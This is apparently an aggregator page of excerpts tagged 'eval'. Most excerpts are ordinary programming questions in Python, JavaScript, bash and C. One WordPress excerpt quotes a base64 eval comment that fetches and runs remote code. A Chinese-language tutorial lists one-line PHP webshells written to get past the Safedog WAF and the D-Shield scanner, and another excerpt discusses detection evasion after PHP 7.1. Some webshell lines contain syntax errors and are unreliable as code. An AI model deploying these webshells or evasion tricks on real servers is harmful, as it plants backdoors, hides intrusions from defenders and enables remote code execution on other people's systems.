eval

Python saving an eval function

北城以北 submitted on 2019-12-10 13:13:26
Question: Say I have a function fun(f, x, y) where x and y are numbers and f is a string specifying a function such as "1 / x ** 2 + y". I wish to use this function f a lot, say a few million times, and the values of x and y change between each use. Therefore calling eval(f) takes a significant amount of time as opposed to just calculating the value of the function each time. (About 50x, in my measured case.) Is there any way to save this function f so that I would only have to call eval once? PS.

Eval Base64 virus Wordpress [duplicate]

前提是你 submitted on 2019-12-10 12:15:38
Question: This question already has answers here: How to get rid of eval-base64_decode like PHP virus files? (7 answers) Closed 3 years ago. I'm using a WordPress blog; today I got a comment like this:

    <!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->

When I've decoded this comment using a decoder I got $data = file_get_contents("https://s3

eval() with variables from an object in the scope

落花浮王杯 submitted on 2019-12-10 11:34:16
Question: How can I execute a string as code (using eval()) and give it some variables? For example, I've got an object named vars and want each of its properties to be accessible for the code without explicitly specifying the object's name. Something like this:

    function evalWithVariables(func, vars) {
      //some magic here
      return eval(func);
    }
    function test() {
      var retval = evalWithVariables("a>5", {"a":7});
      console.log(retval);
    }

Oh, and the code is trusted, it comes from the same server as the script,

Bypassing a WAF: one-line webshells

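こ雲淡風輕ζ submitted on 2019-12-10 11:27:59
Note: the test environment here is the latest Safedog (安全狗) for Apache, V4.0. One-line webshell: <?php eval($_REQUEST['a'])?>
1. Written this way it is easily blocked by Safedog and similar products, so consider replacing certain functions, for example swapping eval for assert(), create_function() or call_user_func().
2. Use the end() function instead, which can be written as: <?php eval(end($_REQUEST)); ?> Note: the password can be anything. Safedog does not detect this, but D盾 (D-Shield) reports a lowest-level risk, so to make D盾 detect nothing at all it can be written like this: <?php if($_SERVER['HTTP_USER_AGENT'] === '1'{ eval(end($_REQUEST));} ?>
3. String concatenation plus a double dollar sign: <?php $a='ass'; $b='ert'; $funcName=$a.$b //assert $x='funcName'; $$x($_REQUEST['a']); ?>
4. Constants: <?php defin("a","$_REQUEST['a']");eval(a); ?>
5. Forced splitting with a function: <?php function a($a){ return $a;} eval (a($_REQUEST)['hh']); ?>
6. Splitting with a class: <?php class User {public $name=' ';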

Accessing Global Vars with Window

帅比萌擦擦* submitted on 2019-12-10 10:26:18
Question: Why doesn't window.x print out 10?

    eval("var x = 10;");
    console.log(window.x); // undefined
    console.log(x); // 10

http://jsfiddle.net/kzd4z/1/

Answer 1: You have selected onLoad in the side panel, which wraps everything in an anonymous function. If you pick "No wrap" it works. Demo: http://jsfiddle.net/kzd4z/2/ You can see this by viewing source:

    //<![CDATA[
    window.onload=function(){
    eval("var x = 10;");
    console.log(window.x); // undefined
    console.log(x); // 10
    }//]]>

Answer 2: Expanding on @Dennis'

Using an environment variable to pass arguments to a command

牧云@^-^@ submitted on 2019-12-10 10:07:25
Question: I'm trying to write a bash script that takes an environment variable and passes it along to a command. So if I had something like:

    export OUT="-a=arg1 -b=\"arg2.0 arg2.1\""

I want in my bash script to do something like:

    <command> -a=arg1 '-b=arg2.0 arg2.1'

I have one approach that seems to do this, but it involves using eval:

    eval <command> ${OUT}

If I include set -x right about the command, I will see:

    + eval <command> a=arg1 'b="arg2.0' 'arg2.1"'
    ++ <command> -a=arg1 '-b=arg2.0 arg.1'

Webshell detection evasion after PHP 7.1

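扶醉桌前 submitted on 2019-12-10 08:31:01
The strict D盾

D盾 says: I am a strict one; when I see eval I report a trojan. "Looks like" = "is" a trojan; better to wrongly kill a thousand than let a single one slip through. Enough talk; let's look at how the strict D盾 produces false positives. I casually wrote a PHP file, with the following code:

    <?php
    function encode($para0){ return $para0; }
    $b = encode("aaaa");
    $a = "ccc";
    eval($a);
    ?>

Clearly no parameter is passed in, neither GET nor POST, so it is simply not a trojan, yet D盾 flagged it outright as a known backdoor, which made me want to cry, as shown below:

Most people's earliest bypasses were probably based on splitting and hiding "assert", but assert has been removed since PHP 7.1, so where do we penetration testers go from here? Can we find new techniques? Of course, there are countless techniques, and looking for rarely used functions or rarely used special characters are both good choices. But can we borrow the pre-PHP 7.1 idea of hiding and splitting "assert"? The answer is yes: we can try hiding and splitting the argument passed into eval, dealing with the eval function directly to bypass detection.

Hiding POST and GET

After PHP 7.1, if we change our thinking and stop fixating on hiding command-execution functions such as assert and eval (because assert no longer works, can no longer be hidden and need not be hidden) and instead face eval directly: as is easy to see in my example above, I just passed an arbitrary argument "ccc" into eval and D盾 directly reported a known backdoor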

Pythonic way to eval all octal values in a string as integers

白昼怎懂夜的黑 submitted on 2019-12-10 03:57:56
Question: So I've got a string that looks like "012 + 2 - 01 + 24" for example. I want to be able to quickly (less code) evaluate that expression... I could use eval() on the string, but I don't want 012 to be represented in octal form (10), I want it to be represented as an int (12). My solution for this works, but it is not elegant. I am sort of assuming that there is a really good pythonic way to do this. My solution:

    #expression is some string that looks like "012 + 2 - 01 + 24"
    atomlist = []
    for

Is this a Chrome bug or is my use of “use strict” and eval invalid?

纵然是瞬间 submitted on 2019-12-10 02:21:50
Question: This code alerts "ok" in all browsers except Chrome:

    eval("var outer = 0; function test() {'use strict'; outer = 1; } test(); alert('ok');");

(Try it on jsfiddle). All I'm doing is referencing an outer variable from a 'use strict' function, all in eval context. Chrome says Uncaught ReferenceError: outer is not defined. Note: I originally faced it when using devtool: 'eval' in Webpack.

Answer 1: To simplify the problem: http://jsfiddle.net/rokkkjcs/6/

    eval("var outer=0;");
    function test() {

Writing `eval()` in C

假装没事ソ submitted on 2019-12-10 02:09:54
Question: I've been trying to make an eval function in C for a while. At the moment, my idea is to make a hash String -> function pointer with all the standard library C functions, and all the functions that I make, that way I could handle function invocations (on already defined functions). However, defining functions with strings (i.e., calling eval("int fun(){return 1;}")) is still a problem, I don't know how I could handle this at runtime, does anyone have any idea? Variable definitions don't seem